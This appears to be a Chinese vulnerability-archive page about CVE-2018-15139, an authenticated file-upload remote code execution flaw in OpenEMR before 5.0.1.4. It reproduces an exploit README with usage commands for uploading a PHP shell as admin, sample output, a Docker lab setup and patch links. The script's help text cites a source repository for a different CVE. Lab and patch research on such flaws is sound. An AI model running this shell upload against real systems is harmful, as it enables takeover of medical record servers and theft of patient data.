关联漏洞
标题:
OpenEMR 安全漏洞
(CVE-2018-15139)
描述:OpenEMR是OpenEMR社区所维护的一套开源的医疗管理系统。该系统可用于医疗实践管理、电子医疗记录、处方书写和医疗帐单申请。 OpenEMR 5.0.1.4之前版本的interface/super/manage_site_files.php文件中存在安全漏洞,该漏洞源于程序未限制上传的文件。远程攻击者可借助图像上传表单上传PHP文件并且访问该文件利用该漏洞执行任意PHP代码。
描述
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
介绍
# OpenEMR CVE-2018-15139 exploit
> OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
Exploit for [CVE-2018-15139][CVE-2018-15139].
## Usage
```
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
Source: https://github.com/sec-it/exploit-CVE-2019-14530
Usage:
exploit.rb exploit <url> <filename> <username> <password> [--debug]
exploit.rb -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<filename> Filename of the shell to be uploaded
<username> Username of the admin
<password> Password of the admin
--debug Display arguments
-h, --help Show this screen
Examples:
exploit.rb exploit http://example.org/openemr shell.php admin pass
exploit.rb exploit https://example.org:5000/ shell.php admin pass
```
## Example
```
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php
```
## Requirements
- [httpx](https://gitlab.com/honeyryderchuck/httpx)
- [docopt.rb](https://github.com/docopt/docopt.rb)
Example using gem:
```bash
bundle install
# or
gem install httpx docopt
```
## Docker deployment of the vulnerable software
Warning: of course this setup is not suited for production usage!
```
$ sudo docker-compose up
```
The upload folder permissions are broken in the official OpenEMR docker image, so it is required to connect to the container and fix the permissions, eg.:
```
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/
```
## References
- Target software: **OpenEMR**
- Homepage: https://www.open-emr.org/
- Source: https://github.com/openemr/openemr
- Docker: see `docker-compose.yml`
- Vulnerable version: < 5.0.1.4 (it means up to 5.0.1.3)
- Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485
This is a better re-write [EDB-49998][EDB-49998].
The vulnerability was found by [Project Insecurity](https://insecurity.sh/).
Analysis of the original exploit and vulnerability:
- [OpenEMR patches serious vulnerabilities uncovered by Project Insecurity](https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/)
[EDB-49998]:https://www.exploit-db.com/exploits/49998
[CVE-2018-15139]:https://nvd.nist.gov/vuln/detail/CVE-2018-15139
文件快照
[4.0K] /data/pocs/f1da9206b719f9a3912d8836cc7cd15a0ead7c97
├── [1002] docker-compose.yml
├── [2.7K] exploit.rb
├── [ 80] Gemfile
├── [ 272] Gemfile.lock
├── [1.1K] LICENSE
└── [2.4K] README.md
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。